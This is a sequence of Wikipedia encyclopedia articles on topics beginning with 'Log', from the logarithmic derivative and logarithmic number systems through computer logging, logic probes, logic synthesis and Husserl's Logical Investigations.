The formula as given can be applied more widely; for example if f ( z ) is a meromorphic function , it makes sense at all complex values of z at which f has neither a zero nor a pole . Further, at a zero or a pole the logarithmic derivative behaves in a way that is easily analysed in terms of the particular case
with n an integer, n ≠ 0 . The logarithmic derivative is then n / z {\displaystyle n/z} and one can draw the general conclusion that for f meromorphic, the singularities of the logarithmic derivative of f are all simple poles, with residue n from a zero of order n , residue − n from a pole of order n . See argument principle . This information is often exploited in contour integration . [ 2 ] [ 3 ] [ verification needed ]
In the field of Nevanlinna theory , an important lemma states that the proximity function of a logarithmic derivative is small with respect to the Nevanlinna characteristic of the original function, for instance m ( r , h ′ / h ) = S ( r , h ) = o ( T ( r , h ) ) {\displaystyle m(r,h'/h)=S(r,h)=o(T(r,h))} . [ 4 ] [ verification needed ]
Behind the use of the logarithmic derivative lie two basic facts about GL 1 , that is, the multiplicative group of real numbers or other field . The differential operator X d d X {\displaystyle X{\frac {d}{dX}}} is invariant under dilation (replacing X by aX for a constant). And the differential form d x X {\displaystyle {\frac {dx}{X}}} is likewise invariant. For functions F into GL 1 , the formula d F F {\displaystyle {\frac {dF}{F}}} is therefore a pullback of the invariant form. [ citation needed ] | https://en.wikipedia.org/wiki/Logarithmic_derivative |
A logarithmic number system ( LNS ) is an arithmetic system used for representing real numbers in computer and digital hardware , especially for digital signal processing .
A number, X {\displaystyle X} , is represented in an LNS by two components: the logarithm ( x {\displaystyle x} ) of its absolute value (as a binary word usually in two's complement ), and its sign bit ( s {\displaystyle s} ):
An LNS can be considered as a floating-point number with the significand being always equal to 1 and a non-integer exponent . This formulation simplifies the operations of multiplication, division, powers and roots, since they are reduced down to addition, subtraction, multiplication, and division, respectively.
On the other hand, the operations of addition and subtraction are more complicated and are calculated by the formulae
where the "sum" function is defined by s b ( z ) = log b ( 1 + b z ) {\displaystyle s_{b}(z)=\log _{b}(1+b^{z})} , and the "difference" function by d b ( z ) = log b | 1 − b z | {\displaystyle d_{b}(z)=\log _{b}|1-b^{z}|} . These functions s b ( z ) {\displaystyle s_{b}(z)} and d b ( z ) {\displaystyle d_{b}(z)} are also known as Gaussian logarithms .
The simplification of multiplication, division, roots, and powers is counterbalanced by the cost of evaluating these functions for addition and subtraction. This added cost of evaluation may not be critical when using an LNS primarily for increasing the precision of floating-point math operations.
Logarithmic number systems have been independently invented and published at least three times as an alternative to fixed-point and floating-point number systems. [ 1 ]
Nicholas Kingsbury and Peter Rayner introduced "logarithmic arithmetic" for digital signal processing (DSP) in 1971. [ 2 ]
A similar LNS named "signed logarithmic number system" (SLNS) was described in 1975 by Earl Swartzlander and Aristides Alexopoulos ; rather than use two's complement notation for the logarithms, they offset them (scale the numbers being represented) to avoid negative logs. [ 3 ]
Samuel Lee and Albert Edgar described a similar system, which they called the "Focus" number system, in 1977. [ 4 ] [ 1 ] [ 5 ] [ 6 ]
The mathematical foundations for addition and subtraction in an LNS trace back to Zecchini Leonelli and Carl Friedrich Gauss in the early 1800s. [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ]
In the late 1800s, the Spanish engineer Leonardo Torres Quevedo conceived a series of analogue calculating mechanical machines [ 12 ] [ 13 ] and developed one that could solve algebraic equations with eight terms, finding the roots, including the complex ones. One part of this machine called an "endless spindle" allowed the mechanical expression of the relation y = log ( 1 + 10 x ) {\displaystyle y=\log(1+10^{x})} , [ 14 ] with the aim of extracting the logarithm of a sum as a sum of logarithms.
A LNS has been used in the Gravity Pipe ( GRAPE-5 ) special-purpose supercomputer [ 15 ] that won the Gordon Bell Prize in 1999.
A substantial effort to explore the applicability of LNSs as a viable alternative to floating point for general-purpose processing of single-precision real numbers is described in the context of the European Logarithmic Microprocessor (ELM). [ 16 ] [ 17 ] A fabricated prototype of the processor, which has a 32-bit cotransformation-based LNS arithmetic logic unit (ALU), demonstrated LNSs as a "more accurate alternative to floating-point", with improved speed. Further improvement of the LNS design based on the ELM architecture has shown its capability to offer significantly higher speed and accuracy than floating-point as well. [ 18 ]
LNSs are sometimes used in FPGA -based applications where most arithmetic operations are multiplication or division. [ 19 ] | https://en.wikipedia.org/wiki/Logarithmic_number_system |
A logarithmic scale (or log scale ) is a method used to display numerical data that spans a broad range of values, especially when there are significant differences between the magnitudes of the numbers involved.
Unlike a linear scale where each unit of distance corresponds to the same increment, on a logarithmic scale each unit of length is a multiple of some base value raised to a power, and corresponds to the multiplication of the previous value in the scale by the base value. In common use, logarithmic scales are in base 10 (unless otherwise specified).
A logarithmic scale is nonlinear , and as such numbers with equal distance between them such as 1, 2, 3, 4, 5 are not equally spaced. Equally spaced values on a logarithmic scale have exponents that increment uniformly. Examples of equally spaced values are 10, 100, 1000, 10000, and 100000 (i.e., 10 1 , 10 2 , 10 3 , 10 4 , 10 5 ) and 2, 4, 8, 16, and 32 (i.e., 2 1 , 2 2 , 2 3 , 2 4 , 2 5 ).
Exponential growth curves are often depicted on a logarithmic scale graph .
The markings on slide rules are arranged in a log scale for multiplying or dividing numbers by adding or subtracting lengths on the scales.
The following are examples of commonly used logarithmic scales, where a larger quantity results in a higher value:
The following are examples of commonly used logarithmic scales, where a larger quantity results in a lower (or negative) value:
Some of our senses operate in a logarithmic fashion ( Weber–Fechner law ), which makes logarithmic scales for these input quantities especially appropriate. In particular, our sense of hearing perceives equal ratios of frequencies as equal differences in pitch. In addition, studies of young children in an isolated tribe have shown logarithmic scales to be the most natural display of numbers in some cultures. [ 1 ]
The top left graph is linear in the X- and Y-axes, and the Y-axis ranges from 0 to 10. A base-10 log scale is used for the Y-axis of the bottom left graph, and the Y-axis ranges from 0.1 to 1000.
The top right graph uses a log-10 scale for just the X-axis, and the bottom right graph uses a log-10 scale for both the X axis and the Y-axis.
Presentation of data on a logarithmic scale can be helpful when the data:
A slide rule has logarithmic scales, and nomograms often employ logarithmic scales. The geometric mean of two numbers is midway between the numbers. Before the advent of computer graphics, logarithmic graph paper was a commonly used scientific tool.
If both the vertical and horizontal axes of a plot are scaled logarithmically, the plot is referred to as a log–log plot .
If only the ordinate or abscissa is scaled logarithmically, the plot is referred to as a semi-logarithmic plot.
A modified log transform can be defined for negative input ( y < 0) to avoid the singularity for zero input ( y = 0), and so produce symmetric log plots: [ 2 ] [ 3 ]
for a constant C =1/ln(10).
A logarithmic unit is a unit that can be used to express a quantity ( physical or mathematical) on a logarithmic scale, that is, as being proportional to the value of a logarithm function applied to the ratio of the quantity and a reference quantity of the same type. The choice of unit generally indicates the type of quantity and the base of the logarithm.
Examples of logarithmic units include units of information and information entropy ( nat , shannon , ban ) and of signal level ( decibel , bel, neper ). Frequency levels or logarithmic frequency quantities have various units are used in electronics ( decade , octave ) and for music pitch intervals ( octave , semitone , cent , etc.). Other logarithmic scale units include the Richter magnitude scale point.
In addition, several industrial measures are logarithmic, such as standard values for resistors , the American wire gauge , the Birmingham gauge used for wire and needles, and so on.
The two definitions of a decibel are equivalent, because a ratio of power quantities is equal to the square of the corresponding ratio of root-power quantities . [ citation needed ] [ 4 ] | https://en.wikipedia.org/wiki/Logarithmic_scale |
Logeion is an open-access database of Latin and Ancient Greek dictionaries. [ 1 ] Developed by Josh Goldenberg and Matt Shanahan in 2011, it is hosted by the University of Chicago . Apart from simultaneous search capabilities across different dictionaries and reference works, Logeion offers access to frequency and collocation data from the Perseus Project .
Having started out as an aggregator for Latin and Ancient Greek dictionaries, Logeion has implemented multiple new features in its development. These include:
Furthermore, an iOS app was developed by Joshua Day in 2013. The app's second version, launched in 2018, is also available for Android devices.
As of November 2018, Logeion contains the following dictionaries. [ 2 ]
This database -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logeion |
In computing , logging is the act of keeping a log of events that occur in a computer system, such as problems, errors or just information on current operations. These events may occur in the operating system or in other software . A message or log entry is recorded for each such event. These log messages can then be used to monitor and understand the operation of the system, to debug problems, or during an audit . Logging is particularly important in multi-user software , to have a central overview of the operation of the system.
In the simplest case, messages are written to a file, called a log file . [ 1 ] Alternatively, the messages may be written to a dedicated logging system or to a log management software, where it is stored in a database or on a different computer system.
Specifically, a transaction log is a log of the communications between a system and the users of that system, [ 2 ] or a data collection method that automatically captures the type, content, or time of transactions made by a person from a terminal with that system. [ 3 ] For Web searching, a transaction log is an electronic record of interactions that have occurred during a searching episode between a Web search engine and users searching for information on that Web search engine.
Many operating systems, software frameworks and programs include a logging system. A widely used logging standard is Syslog , defined in IETF RFC 5424. [ 4 ] The Syslog standard enables a dedicated, standardized subsystem to generate, filter, record, and analyze log messages. This relieves software developers of having to design and code their ad hoc logging systems. [ 5 ] [ 6 ] [ 7 ]
Event logs record events taking place in the execution of a system that can be used to understand the activity of the system and to diagnose problems.
They are essential to understand particularly in the case of applications with little user interaction.
It can also be useful to combine log file entries from multiple sources. It is a different combination that may yield between with related events on different servers. Other solutions employ network-wide querying and reporting . [ 8 ] [ 9 ]
Most database systems maintain some kind of transaction log , which are not mainly intended as an audit trail for later analysis, and are not intended to be human-readable . These logs record changes to the stored data to allow the database to recover from crashes or other data errors and maintain the stored data in a consistent state. Thus, database systems usually have both general event logs and transaction logs. [ 10 ] [ 11 ] [ 12 ] [ 13 ]
The use of data stored in transaction logs of Web search engines, Intranets, and Web sites can provide valuable insight into understanding the information-searching process of online searchers. [ 14 ] This understanding can enlighten information system design, interface development, and devising the information architecture for content collections.
Internet Relay Chat (IRC) , instant messaging (IM) programs, peer-to-peer file sharing clients with chat functions, and multiplayer games (especially MMORPGs ) commonly have the ability to automatically save textual communication, both public (IRC channel/IM conference/MMO public/party chat messages) and private chat between users, as message logs. [ 15 ] Message logs are almost universally plain text files, but IM and VoIP clients (which support textual chat, e.g. Skype) might save them in HTML files or in a custom format to ease reading or enable encryption .
In the case of IRC software, message logs often include system/server messages and entries related to channel and user changes (e.g. topic change, user joins/exits/ kicks / bans , nickname changes, the user status changes), making them more like a combined message/event log of the channel in question, but such a log is not comparable to a true IRC server event log, because it only records user-visible events for the time frame the user spent being connected to a certain channel.
Instant messaging and VoIP clients often offer the chance to store encrypted logs to enhance the user's privacy. These logs require a password to be decrypted and viewed, and they are often handled by their respective writing application. Some privacy focused messaging services, such as Signal , record minimal logs about users, limiting their information to connection times. [ 16 ]
A server log is a log file (or several files) automatically created and maintained by a server consisting of a list of activities it performed.
A typical example is a web server log which maintains a history of page requests. The W3C maintains a standard format (the Common Log Format ) for web server log files, but other proprietary formats exist. [ 9 ] Some servers can log information to computer readable formats (such as JSON ) versus the human readable standard. [ 17 ] More recent entries are typically appended to the end of the file. Information about the request, including client IP address , request date / time , page requested, HTTP code, bytes served, user agent , and referrer are typically added. This data can be combined into a single file, or separated into distinct logs, such as an access log, error log, or referrer log. However, server logs typically do not collect user-specific information.
These files are usually not accessible to general Internet users, only to the webmaster or other administrative person of an Internet service. A statistical analysis of the server log may be used to examine traffic patterns by time of day, day of week, referrer, or user agent. Efficient web site administration, adequate hosting resources and the fine tuning of sales efforts can be aided by analysis of the web server logs. | https://en.wikipedia.org/wiki/Logging_(computing) |
Logging as a service (LaaS) is an IT architectural model for centrally ingesting and collecting any type of log files coming from any given source or location such as servers , applications , devices etc. The files are "normalized" or filtered for reformatting and forwarding to other dependent systems to be processed as “native” data, which can then be managed, displayed and ultimately disposed of according to a predesignated retention schedule based on any number of criteria.
In an enterprise situation, the IT datacenter becomes the hub for all log files and normalization. In a managed service provider (MSP) environment, the log sources would be coming from applications outside the enterprise but still hosted and managed by the MSP as needed.
Under this model, the IT datacenter acts as the " private cloud " under the concept of cloud computing to provision the logs to various stakeholders within the organization for future forensics [ 1 ] or analysis to identify risks, patterns of activity or predict behaviors based on the data collected within the logs. Just as IT becomes the "hub" of the service, the stakeholders become the beneficiaries of the centralized data in the form of alerts, reports or any periphery applications for predictive analysis or insight from big data through graphical display.
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logging_as_a_service |
Logic Trunked Radio ( LTR ) is a radio system developed in the late 1970s by the E. F. Johnson Company . [ 1 ]
LTR is distinguished from some other common trunked radio systems in that it does not have a dedicated control channel . LTR systems are limited to 20 channels (repeaters) per site and each site stands alone (not linked). is Each repeater has its own controller and all of these controllers are coordinated together. Even though each controller monitors its own channel, one of the channel controllers is assigned to be a master and all the other controllers report to it.
Typically on LTR systems, each of these controllers periodically sends out a data burst (approximately every 10 seconds on LTR Standard systems) so that the subscriber units know that the system is there and which channels are in use or available. The idle data burst can be turned off if desired by the system operator. Some systems will broadcast idle data bursts only on channels used as home channels and not on those used for "overflow" conversations. To a listener, the idle data burst will sound like a short blip of static like someone keyed up and unkeyed a radio within about 1/4 second. This data burst is not sent at the same time by all the channels but happen randomly throughout all the system channels. | https://en.wikipedia.org/wiki/Logic_Trunked_Radio |
Formal scientists have attempted to combine formal logic (the science of deductively valid inferences or of logical truths ) and dialectic (a form of reasoning based upon dialogue of arguments and counter-arguments) through formalisation of dialectic. These attempts include pre-formal and partially formal treatises on argument and dialectic , systems based on defeasible reasoning , and systems based on game semantics and dialogical logic .
Since the late 20th century, European and American logicians have attempted to provide mathematical foundations for dialectic through formalisation, [ 1 ] : 201–372 although logic has been related to dialectic since ancient times. [ 1 ] : 51–140 There have been pre-formal and partially-formal treatises on argument and dialectic, from authors such as Stephen Toulmin ( The Uses of Argument , 1958), [ 2 ] [ 3 ] [ 1 ] : 203–256 Nicholas Rescher ( Dialectics: A Controversy-Oriented Approach to the Theory of Knowledge , 1977), [ 4 ] [ 5 ] [ 1 ] : 330–336 and Frans H. van Eemeren and Rob Grootendorst ( pragma-dialectics , 1980s). [ 1 ] : 517–614 One can include works of the communities of informal logic and paraconsistent logic . [ 1 ] : 373–424
Building on theories of defeasible reasoning (see John L. Pollock ), systems have been built that define well-formedness of arguments, rules governing the process of introducing arguments based on fixed assumptions, and rules for shifting burden. [ 1 ] : 615–675 Many of these logics appear in the special area of artificial intelligence and law , though the computer scientists' interest in formalizing dialectic originates in a desire to build decision support and computer-supported collaborative work systems. [ 6 ]
Dialectic itself can be formalised as moves in a game, where an advocate for the truth of a proposition and an opponent argue. [ 1 ] : 301–372 Such games can provide a semantics of logic , one that is very general in applicability. [ 1 ] : 314
This philosophy -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logic_and_dialectic |
As the study of argument is of clear importance to the reasons that we hold things to be true, logic is of essential importance to rationality . Arguments may be logical if they are "conducted or assessed according to strict principles of validity ", [ 1 ] while they are rational according to the broader requirement that they are based on reason and knowledge .
Logic and rationality have each been taken as fundamental concepts in philosophy . They are not the same thing. Philosophical rationalism in its most extreme form is the doctrine that knowledge can ultimately be founded on pure reason, while logicism is the doctrine that mathematical concepts, among others, are reducible to pure logic.
Deductive reasoning concerns the logical consequence of given premises. On a narrow conception of logic, logic concerns just deductive reasoning, although such a narrow conception controversially excludes most of what is called informal logic from the discipline. Other forms of reasoning are sometimes also taken to be part of logic, such as inductive reasoning and abductive reasoning , which are forms of reasoning that are not purely deductive, but include material inference . Similarly, it is important to distinguish deductive validity and inductive validity (called "strength"). An inference is deductively valid if and only if there is no possible situation in which all the premises are true but the conclusion false. An inference is inductively strong if and only if its premises give some degree of probability to its conclusion.
The notion of deductive validity can be rigorously stated for systems of formal logic in terms of the well-understood notions of semantics . Inductive validity, on the other hand, requires us to define a reliable generalization of some set of observations. The task of providing this definition may be approached in various ways, some less formal than others; some of these definitions may use logical association rule induction , while others may use mathematical models of probability such as decision trees . For the most part this discussion of logic deals only with deductive logic.
Abductive reasoning is a form of inference which goes from an observation to a theory which accounts for the observation, ideally seeking to find the simplest and most likely explanation. In abductive reasoning, unlike in deductive reasoning, the premises do not guarantee the conclusion. One can understand abductive reasoning as "inference to the best explanation". [ 2 ]
Critical thinking, also called critical analysis, is clear, rational thinking involving critique .
Dialectic is a discourse between two or more people holding different points of view about a subject but wishing to establish the truth through reasoned arguments. It has been the object of study since ancient times, but only recently has it been the subject of attempts at formalisation.
Illogicality in terms of thinking processes are, as defined by researchers such as Aaron T. Beck , cognitive distortions that cause abnormal functioning. The state of depression often feeds off of illogical thinking and results in victims being mired in self-defeating conclusions. Patients seeking psychological help may suffer from problems of over-generalization , becoming mired in general, negative conclusions on the basis of essentially insignificant life events. Cognitive behavioral therapy can assist individuals in recognizing their own habits of faulty logic and slanted interpretations of past experiences. [ 3 ]
On the other hand, depression in the sense of "Weltschmerz" in its non-aesthetically realistic and non-positivistic nature is intrinsically logical and rational. Some philosophers assert that the question of value of life has not been answered in psychologically pleasing way without embracing circular reasoning fallacy. [ 4 ] [ 5 ]
In the socio-political context, the ability to amalgamate disparate, conflicting interests and passions into an illogical synthesis has been labeled as a possible strength, albeit one with concurrent weaknesses, by literary publications such as Blackwood's Magazine :
It is difficult not to connect together these two very characteristic ideas of illogicalness and permanence. Not that illogicalness is itself a virtue, but the illogicalness of which we speak is not simply bad reasoning. It means here only that more than one principle is found to assert itself in... social work. But these principles are fused into a higher unity. The illogicalness is not the cause of the permanence, but rather both are joint products of a common cause—respect, namely, for the living forces which exist in human nature. [ 6 ] | https://en.wikipedia.org/wiki/Logic_and_rationality |
In computer programming , a logic error is a bug in a program that causes it to operate incorrectly, but not to terminate abnormally (or crash ). [ 1 ] A logic error produces unintended or undesired output or other behaviour, although it may not immediately be recognized as such.
Logic errors occur in both compiled and interpreted languages. Unlike a program with a syntax error , a program with a logic error is a valid program in the language, though it does not behave as intended. Often the only clue to the existence of logic errors is the production of wrong solutions, though static analysis may sometimes spot them.
One of the ways to find this type of error is to put out the program's variables to a file or on the screen in order to determine the error's location in code. Although this will not work in all cases, for example when calling the wrong subroutine , it is the easiest way to find the problem if the program uses the incorrect results of a bad mathematical calculation .
This example function in C to calculate the average of two numbers contains a logic error. It is missing parentheses in the calculation, so it compiles and runs but does not give the expected answer due to operator precedence (division is evaluated before addition).
This computer-programming -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logic_error |
The logic of information , or the logical theory of information , considers the information content of logical signs and expressions along the lines initially developed by Charles Sanders Peirce . In this line of work, the concept of information serves to integrate the aspects of signs and expressions that are separately covered, on the one hand, by the concepts of denotation and extension , and on the other hand, by the concepts of connotation and comprehension .
Peirce began to develop these ideas in his lectures "On the Logic of Science" at Harvard University (1865) and the Lowell Institute (1866).
This semiotics article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logic_of_information |
A logic probe is a low-cost hand-held test probe used for analyzing and troubleshooting the logical states ( boolean 0 or 1) of a digital circuit. When many signals need to be observed or recorded simultaneously, a logic analyzer is used instead.
While most logic probes are powered by the circuit under test, some devices use batteries. They can be used on either TTL (transistor-transistor logic) or CMOS (complementary metal-oxide semiconductor) logic integrated circuit devices, such as 7400-series , 4000 series , and newer logic families that support similar voltages.
Most modern logic probes typically have one or more LEDs on the body of the probe:
A control on the logic probe allows either the capture and storage of a single event or continuous running.
When the logic probe is either connected to an invalid logic level (a fault condition or a tri-stated output) or not connected at all, none of the LEDs light up.
Another control on the logic probe allow selection of either TTL or CMOS family logic. This is required as these families have different thresholds for the logic-high (V IH ) and logic-low (V IL ) circuit voltages .
Some logic probes have an audible tone, of which vary across models. A model may 1) emit a tone for high logic state otherwise no tone, or 2) emit a higher frequency tone for a high logic state, lower frequency tone for a low logic state, and no tone for no connection or tri-state. An oscillating signal causes the probe to alternate between high-state and low-state tones.
The logic probe was invented by Gary Gordon in 1968 while he was employed by Hewlett-Packard . [ 2 ] [ 3 ] | https://en.wikipedia.org/wiki/Logic_probe |
Logic redundancy occurs in a digital gate network containing circuitry that does not affect the static logic function. There are several reasons why logic redundancy may exist. One reason is that it may have been added deliberately to suppress transient glitches (thus causing a race condition ) in the output signals by having two or more product terms overlap with a third one.
Consider the following equation:
The third product term B C {\displaystyle BC} is a redundant consensus term . If A {\displaystyle A} switches from 1 to 0 while B = 1 {\displaystyle B=1} and C = 1 {\displaystyle C=1} , Y {\displaystyle Y} remains 1. During the transition of signal A {\displaystyle A} in logic gates, both the first and second term may be 0 momentarily. The third term prevents a glitch since its value of 1 in this case is not affected by the transition of signal A {\displaystyle A} .
Another reason for logic redundancy is poor design practices which unintentionally result in logically redundant terms. This causes an unnecessary increase in network complexity, and possibly hampering the ability to test manufactured designs using traditional test methods (single stuck-at fault models). Testing might be possible using IDDQ models.
Logic redundancy is, in general, not desired.
Redundancy, by definition, requires extra parts (in this case: logical terms) which raises the cost of implementation (either actual cost of physical parts or CPU time to process).
Logic redundancy can be removed by several well-known techniques, such as Karnaugh maps , the Quine–McCluskey algorithm , and the heuristic computer method .
In some cases it may be desirable to add logic redundancy. One of those cases is to avoid race conditions whereby an output can fluctuate because different terms are "racing" to turn off and on. To explain this in more concrete terms the Karnaugh map to the right shows the minterms for the following function:
The boxes represent the minimal AND/OR terms needed to implement this function:
The k-map visually shows where race conditions occur in the minimal expression by having gaps between minterms, for example, the gap between the blue and green rectangles. If the input were to change from 1110 {\displaystyle 1110} [ 1 ] to 1010 {\displaystyle 1010} then a race will occur between B C D ¯ {\displaystyle BC{\overline {D}}} turning off and A B ¯ {\displaystyle A{\overline {B}}} turning on.
If the blue term switches off before the green turns on then the output will fluctuate and may register as 0.
Another race condition is between the blue and the red for transition from 1110 {\displaystyle 1110} to 1100 {\displaystyle 1100} .
The race condition is removed by adding in logic redundancy.
Both minterm race conditions are covered by addition of the yellow term A D ¯ {\displaystyle A{\overline {D}}} .
In this case, the addition of logic redundancy has stabilized the output to avoid output fluctuations because terms are racing each other to change state. | https://en.wikipedia.org/wiki/Logic_redundancy |
In computer engineering , logic synthesis is a process by which an abstract specification of desired circuit behavior, typically at register transfer level (RTL), is turned into a design implementation in terms of logic gates , typically by a computer program called a synthesis tool . Common examples of this process include synthesis of designs specified in hardware description languages , including VHDL and Verilog . [ 1 ] Some synthesis tools generate bitstreams for programmable logic devices such as PALs or FPGAs , while others target the creation of ASICs . Logic synthesis is one step in circuit design in the electronic design automation , the others are place and route and verification and validation .
The roots of logic synthesis can be traced to the treatment of logic by George Boole (1815 to 1864), in what is now termed Boolean algebra . In 1938, Claude Shannon showed that the two-valued Boolean algebra can describe the operation of switching circuits. In the early days, logic design involved manipulating the truth table representations as Karnaugh maps . The Karnaugh map-based minimization of logic is guided by a set of rules on how entries in the maps can be combined. A human designer can typically only work with Karnaugh maps containing up to four to six variables.
The first step toward automation of logic minimization was the introduction of the Quine–McCluskey algorithm that could be implemented on a computer. This exact minimization technique presented the notion of prime implicants and minimum cost covers that would become the cornerstone of two-level minimization . Nowadays, the much more efficient Espresso heuristic logic minimizer has become the standard tool for this operation. [ needs update ] Another area of early research was in state minimization and encoding of finite-state machines (FSMs), a task that was the bane of designers. The applications for logic synthesis lay primarily in digital computer design. Hence, IBM and Bell Labs played a pivotal role in the early automation of logic synthesis. The evolution from discrete logic components to programmable logic arrays (PLAs) hastened the need for efficient two-level minimization, since minimizing terms in a two-level representation reduces the area in a PLA.
Two-level logic circuits are of limited importance in a very-large-scale integration (VLSI) design; most designs use multiple levels of logic. Almost any circuit representation in RTL or Behavioural Description is a multi-level representation. An early system that was used to design multilevel circuits was LSS from IBM. It used local transformations to simplify logic. Work on LSS and the Yorktown Silicon Compiler spurred rapid research progress in logic synthesis in the 1980s. Several universities contributed by making their research available to the public, most notably SIS from University of California, Berkeley , RASP from University of California, Los Angeles and BOLD from University of Colorado, Boulder . Within a decade, the technology migrated to commercial logic synthesis products offered by electronic design automation companies.
The leading developers and providers of logic synthesis software packages are Synopsys , Cadence , and Siemens . Their synthesis tools are Synopsys Design Compiler, Cadence First Encounter and Siemens Precision RTL.
Logic design is a step in the standard design cycle in which the functional design of an electronic circuit is converted into the representation which captures logic operations , arithmetic operations , control flow , etc. A common output of this step is RTL description . Logic design is commonly followed by the circuit design step. In modern electronic design automation parts of the logical design may be automated using high-level synthesis tools based on the behavioral description of the circuit. [ 2 ]
Logic operations usually consist of Boolean AND, OR, XOR and NAND operations, and are the most basic forms of operations in an electronic circuit. Arithmetic operations are usually implemented with the use of logic operators.
With a goal of increasing designer productivity, research efforts on the synthesis of circuits specified at the behavioral level have led to the emergence of commercial solutions in 2004, [ 3 ] which are used for complex ASIC and FPGA design. These tools automatically synthesize circuits specified using high-level languages, like ANSI C/C++ or SystemC, to a register transfer level (RTL) specification, which can be used as input to a gate-level logic synthesis flow. [ 3 ] Using high-level synthesis, also known as ESL synthesis, the allocation of work to clock cycles and across structural components, such as floating-point ALUs, is done by the compiler using an optimisation procedure, whereas with RTL logic synthesis (even from behavioural Verilog or VHDL, where a thread of execution can make multiple reads and writes to a variable within a clock cycle) those allocation decisions have already been made.
Typical practical implementations of a logic function utilize a multi-level network of logic elements. Starting from an RTL description of a design, the synthesis tool constructs a corresponding multilevel Boolean network .
Next, this network is optimized using several technology-independent techniques before technology-dependent optimizations are performed. The typical cost function during technology-independent optimizations is total literal count of the factored representation of the logic function (which correlates quite well with circuit area).
Finally, technology-dependent optimization transforms the technology-independent circuit into a network of gates in a given technology. The simple cost estimates are replaced by more concrete, implementation-driven estimates during and after technology mapping. Mapping is constrained by factors such as the available gates (logic functions) in the technology library, the drive sizes for each gate, and the delay, power , and area characteristics of each gate. | https://en.wikipedia.org/wiki/Logic_synthesis |
The Logical Investigations ( German : Logische Untersuchungen ; 1900–1901, second edition 1913) is a two-volume work by the philosopher Edmund Husserl , in which the author discusses the philosophy of logic and criticizes psychologism , the view that logic is based on psychology .
The work has been praised by philosophers for helping to discredit psychologism, Husserl's opposition to which has been attributed to the philosopher Gottlob Frege 's criticism of his Philosophy of Arithmetic (1891). The Logical Investigations influenced philosophers such as Martin Heidegger and Emil Lask , and contributed to the development of phenomenology , continental philosophy , and structuralism . The Logical Investigations has been compared to the work of the philosophers Immanuel Kant and Wilhelm Dilthey , the latter of whom praised the work. However, the work has been criticized for its obscurity, and some commentators have maintained that Husserl inconsistently advanced a form of psychologism, despite Husserl's critique of psychologism. When Husserl later published Ideas (1913), he lost support from some followers who believed the work adopted a different philosophical position from that which Husserl had endorsed in the Logical Investigations . Husserl acknowledged in his manuscripts that the work suffered from shortcomings.
The Logical Investigations comprise two volumes. In the German editions, these are Volume I, "Prolegomena to Pure Logic" ( Prolegomena zur reinen Logik ), and Volume II, "Investigations in Phenomenology and Knowledge" ( Untersuchungen zur Phänomenologie und Theorie der Erkenntnis ). [ 1 ] [ 2 ]
In Volume I, Husserl writes that the Logical Investigations arose out of problems he encountered in attempting to achieve a "philosophical clarification of pure mathematics", which revealed to him shortcomings of logic as understood in his time. Husserl's "logical researches into formal arithmetic and the theory of manifolds " moved him beyond the study of mathematics and towards "a universal theory of formal deductive systems." He acknowledges that he had previously seen psychology as providing logic with "philosophical clarification", and explains his subsequent abandonment of that assumption. [ 3 ] According to Husserl, logic "seeks to search into what pertains to genuine, valid science as such, what constitutes the Idea of Science, so as to be able to use the latter to measure the empirically given sciences as to their agreement with their Idea, the degree to which they approach it, and where they offend against it." He criticizes empiricism , and critiques psychologism, a position on the nature of logic according to which, the "essential theoretical foundations of logic lie in psychology"; Husserl criticizes the philosopher John Stuart Mill , taking his views on logic as an example of psychologism. He also discusses the views of the philosopher Immanuel Kant, as put forward in the Critique of Pure Reason (1781), as well as those of other philosophers, including Franz Brentano , Alexius Meinong , and Wilhelm Wundt . [ 4 ]
In Volume II, Husserl discusses the relevance of linguistic analysis to logic and continues his criticism of Mill. [ 5 ]
The Logical Investigations was first published in two volumes in 1900 and 1901 by M. Niemeyer. Volume I of the second edition was first published in 1913, and Volume II of the second edition in 1921. In 1970, Routledge & Kegan Paul Ltd published an English translation by the philosopher John Niemeyer Findlay . In 2001, a new edition of Findlay's translation with a preface by the philosopher Michael Dummett and an introduction by the philosopher Dermot Moran was published by Routledge. [ 6 ] [ 7 ] [ 8 ] [ 9 ]
Husserl commented in Ideas that the Logical Investigations had led to phenomenology being mistakenly viewed as a branch of empirical psychology, despite his protests, in the article "Philosophy as Strict Science", that this was a misunderstanding of his work. [ 10 ] Husserl's assessment of the Logical Investigations has been discussed in the Journal of Speculative Philosophy by Ullrich Melle; [ 11 ] the journal also published Husserl's manuscript “On the Task and Historical Position of the Logical Investigations ”. [ 12 ]
Melle wrote that Husserl acknowledged in his manuscripts that the Logical Investigations suffered from shortcomings, which Husserl attributed to his initial failure to fully consider the proper sense and the full implications of their method and his lack of comprehension of how the work was related to both the history of philosophy and contemporary philosophy. According to Melle, Husserl was forced by concerns about his career to publish the Logical Investigations despite his awareness of these problems. He had not expected that the work would receive much attention, since it was allied with neither the trend to return to Kant nor the turn toward experimental psychology, and was surprised when it aroused considerable interest, something Husserl later attributed to its alignment with trends in philosophy, including one Melle summarized as a drive toward "an integration or synthesis of the legitimate motives" of both empiricism and rationalism. He noted that Husserl believed that most reactions to the work involved serious misunderstandings, for which Husserl believed that his use of the misleading term "descriptive psychology", which suggested a relapse into psychologism, was partly responsible. According to Melle, Husserl believed that commentators had wrongly associated his idea of ontology with Meinong's theory of objects, and that Wundt had put forward an unfounded interpretation and critique of the Logical Investigations . He added that when Husserl published Ideas , he dismayed followers who saw it as abandoning Husserl's earlier commitment to realism. [ 11 ]
In “On the Task and Historical Position of the Logical Investigations ”, Husserl sought to explain his use of the term "descriptive psychology". Husserl observed that while he considered the Logical Investigations a development of Brentano's ideas, Brentano himself never recognized them as such due to their "completely different method", whereas Dilthey reacted to them favorably, even though they were not indebted to his writings. According to Husserl, Dilthey saw the work as "a first concrete achievement of his (own) ideas about a descriptive and analytic psychology." Husserl emphasized differences between his "descriptive psychology" and the philosophical approaches of both Brentano and Dilthey. He maintained that despite his "imperfect" approach to consciousness, he had helped to show that consciousness is "an achievement that takes place in manifold verifiable forms and associated syntheses, overall pervasively intentional, goal-oriented, directed toward ideas of truth." [ 12 ]
